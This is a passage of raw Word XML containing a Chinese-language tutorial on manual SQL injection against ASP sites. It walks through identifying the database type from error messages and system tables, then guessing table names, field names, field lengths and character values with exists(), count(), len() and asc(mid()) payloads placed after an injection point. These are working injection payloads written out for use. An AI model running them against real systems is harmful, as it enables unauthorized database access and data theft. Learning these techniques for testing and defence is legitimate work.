        <w:t>是SQL Server的一个内置变量，它的值是当前连接的用户名，其变量类型为“nvarchar"字符型。通过提交查询该变量，根据返回的出错信息即可得知数据库类型。方法是在注入点之后提交如下语句。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A767685" w14:textId="77777777" w:rsidR="003F3513" w:rsidRPr="00BF1BD2" w:rsidRDefault="003F3513"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and user&gt;0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DADB3DE" w14:textId="77777777" w:rsidR="003F3513" w:rsidRPr="00764DAB" w:rsidRDefault="003F35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该查询语句会将user对应的nvarchar型值与int数字型的0进行对比，两个数据类型不一致，因此会返回出错信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDA2689" w14:textId="77777777" w:rsidR="00A86158" w:rsidRPr="00764DAB" w:rsidRDefault="00A8615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提示如下出错信息(图3)</w:t>
      </w:r>
      <w:r w:rsidR="00E97D57" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B053C46" w14:textId="77777777" w:rsidR="00A86158" w:rsidRPr="00BF1BD2" w:rsidRDefault="00A86158"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Microsoft OLE DB Provider for SQL Server 错误'80040e</w:t>
      </w:r>
      <w:r w:rsidR="005B096F" w:rsidRPr="00BF1BD2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>21</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF1BD2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E60F7E" w14:textId="77777777" w:rsidR="00A86158" w:rsidRPr="00764DAB" w:rsidRDefault="00A8615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将nvarchar值'****'转换为数据类型为int的列时发生语法错误。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EED01E1" w14:textId="77777777" w:rsidR="00A86158" w:rsidRPr="00BF1BD2" w:rsidRDefault="00A86158"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w:t>
      </w:r>
      <w:r w:rsidR="005B096F" w:rsidRPr="00BF1BD2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>home</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF1BD2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="005B096F" w:rsidRPr="00BF1BD2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>y</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF1BD2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>z/</w:t>
      </w:r>
      <w:r w:rsidR="005B096F" w:rsidRPr="00BF1BD2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>yu</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF1BD2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/show.asp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756DFBEA" w14:textId="77777777" w:rsidR="00A86158" w:rsidRPr="00764DAB" w:rsidRDefault="00A8615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则可以判断是MS SQL数据库。如果采用的是Access数据库的话，那么提示信息则会如下(图4)。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1766356C" w14:textId="77777777" w:rsidR="00A86158" w:rsidRDefault="00C215A8" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="210"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52D763EE" wp14:editId="2C218711">
            <wp:extent cx="2524034" cy="2083805"/>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2524034" cy="2083805"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="003568E6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D475658" wp14:editId="54C8262A">
            <wp:extent cx="2366341" cy="2095156"/>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376084" cy="2103782"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="471C3BFD" w14:textId="77777777" w:rsidR="005C627A" w:rsidRPr="00276D91" w:rsidRDefault="005C627A" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="210"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">      图3 "and user&gt;0判断法"            图4 Access数据库不会显示类型转换错误</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213624E4" w14:textId="77777777" w:rsidR="008F29D9" w:rsidRPr="00BF1BD2" w:rsidRDefault="008F29D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Microsoft OLE DB Provider Drivers ODBC Drivers 错误 ‘80040e</w:t>
      </w:r>
      <w:r w:rsidR="004A3EB9" w:rsidRPr="00BF1BD2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>21</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF1BD2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3531F959" w14:textId="77777777" w:rsidR="004A3EB9" w:rsidRPr="00BF1BD2" w:rsidRDefault="004A3EB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 xml:space="preserve">ODBC 驱动程序不支持所需的属性。 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59379FDA" w14:textId="77777777" w:rsidR="004A3EB9" w:rsidRPr="00BF1BD2" w:rsidRDefault="004A3EB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 xml:space="preserve">/news_view.asp，行 20 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FC43D7" w14:textId="77777777" w:rsidR="00977033" w:rsidRPr="0077291D" w:rsidRDefault="00F838F6" w:rsidP="009C0A88">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.4.1.2</w:t>
      </w:r>
      <w:r w:rsidR="00FF1B9E">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00977033" w:rsidRPr="0077291D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内置数据表爆数据库类型</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C35A2E" w14:textId="77777777" w:rsidR="00977033" w:rsidRPr="00764DAB" w:rsidRDefault="0097703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服务器IIS不允许返回错误提示，通常可以通过数据库内置的系统数据表来进行判断。在注入点后提交如下查询语句。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56679710" w14:textId="77777777" w:rsidR="00977033" w:rsidRPr="00BF1BD2" w:rsidRDefault="00977033"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select count(*)  from sysobjects)&gt;=O </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1B207F" w14:textId="77777777" w:rsidR="00977033" w:rsidRPr="00BF1BD2" w:rsidRDefault="00977033"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and (select count(*)  from msysobjects)&gt;=O</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBA8041" w14:textId="77777777" w:rsidR="00561851" w:rsidRPr="00764DAB" w:rsidRDefault="0056185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Access存在系统表[msysobjects]，不存在“sysobjects”表。因此如果数据库采用的是Access,会返回如下提示错误信息(图5)。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D70877" w14:textId="77777777" w:rsidR="00C74FC9" w:rsidRPr="00BF1BD2" w:rsidRDefault="00C74FC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Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e37'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6CA8AE" w14:textId="77777777" w:rsidR="003C2E7C" w:rsidRPr="00BF1BD2" w:rsidRDefault="003C2E7C"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home/yz/yu/show.asp, 行 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028FE0D3" w14:textId="77777777" w:rsidR="00C74FC9" w:rsidRPr="00764DAB" w:rsidRDefault="00C74FC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Microsoft][ODBC Microsoft Access Driver] Microsoft Jet数据库引擎找不到输入表或查询'sysobjects'。确定它是否存在，以及它的名称的拼写是否正确。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B0A850" w14:textId="77777777" w:rsidR="0072294F" w:rsidRPr="00764DAB" w:rsidRDefault="0072294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MS SQL Serve:存在系统表[sysobjects]，不存在[msysobjects]系统表，因此会返回如下错误提示信息为(图6).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6835DE9A" w14:textId="77777777" w:rsidR="0072294F" w:rsidRPr="00BF1BD2" w:rsidRDefault="0072294F"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Microsoft OLE DB Provider for SQL Server 错误 '80040e37'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A9AD1B" w14:textId="77777777" w:rsidR="0072294F" w:rsidRPr="00BF1BD2" w:rsidRDefault="0072294F"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对象名 'msysobjects' 无效。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0962EBFC" w14:textId="77777777" w:rsidR="00C74FC9" w:rsidRPr="00BF1BD2" w:rsidRDefault="009A2BD6"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home/yz/yu/show.asp</w:t>
      </w:r>
      <w:r w:rsidR="0072294F" w:rsidRPr="00BF1BD2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>, 行 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3303C9BC" w14:textId="77777777" w:rsidR="00A33737" w:rsidRDefault="001C2286" w:rsidP="00A33737">
      <w:pPr>
        <w:ind w:leftChars="199" w:left="418" w:firstLineChars="95" w:firstLine="199"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D6CFBF1" wp14:editId="790A087E">
            <wp:extent cx="2419350" cy="2752725"/>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2415557" cy="2748409"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="003F499D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10F4AF9B" wp14:editId="16017B18">
            <wp:extent cx="2400300" cy="2743199"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="112" name="图片 22"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59"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2408425" cy="2752485"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="335F0B10" w14:textId="77777777" w:rsidR="00B1510D" w:rsidRPr="003F499D" w:rsidRDefault="00A33737" w:rsidP="003F499D">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210" w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003F499D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>图5 SQL Server数据库中不存在"msysobjects"表</w:t>
      </w:r>
      <w:r w:rsidR="003F499D" w:rsidRPr="003F499D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>图6 Access数据库中不存在sysobjects表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60382F84" w14:textId="77777777" w:rsidR="00B1510D" w:rsidRPr="003A189B" w:rsidRDefault="00F838F6"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4.2</w:t>
      </w:r>
      <w:r w:rsidR="00FF1B9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00B1510D" w:rsidRPr="003A189B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>猜数据库名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6683B876" w14:textId="77777777" w:rsidR="00B1510D" w:rsidRPr="00764DAB" w:rsidRDefault="00B1510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在注入点后提交如下语句进行查询。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66487B14" w14:textId="77777777" w:rsidR="00B1510D" w:rsidRPr="00BF1BD2" w:rsidRDefault="00B1510D"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exi</w:t>
      </w:r>
      <w:r w:rsidR="00BE4D0E" w:rsidRPr="00BF1BD2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF1BD2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ts(select *  from 数据库表名 )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A6A3E8" w14:textId="77777777" w:rsidR="00B1510D" w:rsidRPr="00764DAB" w:rsidRDefault="00B1510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或者</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64EAB580" w14:textId="77777777" w:rsidR="007B6D23" w:rsidRPr="00BF1BD2" w:rsidRDefault="007B6D23"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00BE4D0E" w:rsidRPr="00BF1BD2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>coun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0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B41CE83" w14:textId="77777777" w:rsidR="00B1510D" w:rsidRPr="00764DAB" w:rsidRDefault="00B1510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上面的语句是判断数据库中是否存在指定数据库表名。如果页面返回出错，那么可更换其他常见数据库表名继续进行查询。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469C375B" w14:textId="77777777" w:rsidR="00BE4D0E" w:rsidRPr="00752913" w:rsidRDefault="00F838F6"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highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>1.4.3</w:t>
      </w:r>
      <w:r w:rsidR="00FF1B9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00BE4D0E" w:rsidRPr="00752913">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>猜字段名及字段长度</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720467A3"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在注入点后提交如下语句查询。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E08C04B"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exi</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF1BD2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF1BD2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ts(select 字段名  from 数据库表名 )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C5BC43"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或者</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD426F6"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count(</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0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E7964A"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存在此字段名，返回页面正常，否则可更换字段名继续进行猜测。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7D7671"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猜解字段长度，可提交如下查询语句。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3435938F"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提交&gt;n-1时正常，而提交到&gt;n时返回出错，那么说明字段长度为n。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066AABDF"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len(</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1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45503219"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lastRenderedPageBreak/>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len(</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2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309EC9BE"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56AE3DA3"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len(</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n-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="757F7838"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len(</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n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3633ECAA"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提交&gt;n-1时正常，而提交到&gt;n时返回出错，那么说明字段长度为n。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="010AF407" w14:textId="77777777" w:rsidR="00BE4D0E" w:rsidRPr="003A7546" w:rsidRDefault="00F838F6"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4.4</w:t>
      </w:r>
      <w:r w:rsidR="00FF1B9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00BE4D0E" w:rsidRPr="003A7546">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>猜字段值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4061D9" w14:textId="77777777" w:rsidR="00BE4D0E" w:rsidRPr="00764DAB" w:rsidRDefault="00BE4D0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猜字段的ascii值，可在注入点后提交如下查询语句。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF6893D"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asc</w:t>
      </w:r>
      <w:r w:rsidR="005F4269" w:rsidRPr="00BF1BD2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(mid</w:t>
      </w:r>
      <w:r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1</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF1BD2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF1BD2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1)</w:t>
      </w:r>
      <w:r w:rsidR="005F4269" w:rsidRPr="00BF1BD2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</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w:t>
      </w:r>
      <w:r w:rsidR="00974D01" w:rsidRPr="00BF1BD2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FBD279"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asc</w:t>
      </w:r>
      <w:r w:rsidR="005F4269" w:rsidRPr="00BF1BD2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(mid(</w:t>
      </w:r>
      <w:r w:rsidR="005F4269" w:rsidRPr="00BF1BD2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>字段名,</w:t>
      </w:r>
      <w:r w:rsidR="005F4269" w:rsidRPr="00BF1BD2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="005F4269" w:rsidRPr="00BF1BD2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="005F4269" w:rsidRPr="00BF1BD2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1))</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w:t>
      </w:r>
      <w:r w:rsidR="00974D01" w:rsidRPr="00BF1BD2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC63E00"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7345823A"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asc</w:t>
      </w:r>
      <w:r w:rsidR="005F4269" w:rsidRPr="00BF1BD2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(mid(</w:t>
      </w:r>
      <w:r w:rsidR="005F4269" w:rsidRPr="00BF1BD2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>字段名,</w:t>
      </w:r>
      <w:r w:rsidR="005F4269" w:rsidRPr="00BF1BD2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="005F4269" w:rsidRPr="00BF1BD2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="005F4269" w:rsidRPr="00BF1BD2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1))</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n-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA1F191" w14:textId="77777777" w:rsidR="00BE4D0E" w:rsidRPr="00BF1BD2" w:rsidRDefault="00BE4D0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asc</w:t>
      </w:r>
      <w:r w:rsidR="005F4269" w:rsidRPr="00BF1BD2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(mid(</w:t>
      </w:r>
      <w:r w:rsidR="005F4269" w:rsidRPr="00BF1BD2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>字段名,</w:t>
      </w:r>
      <w:r w:rsidR="005F4269" w:rsidRPr="00BF1BD2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
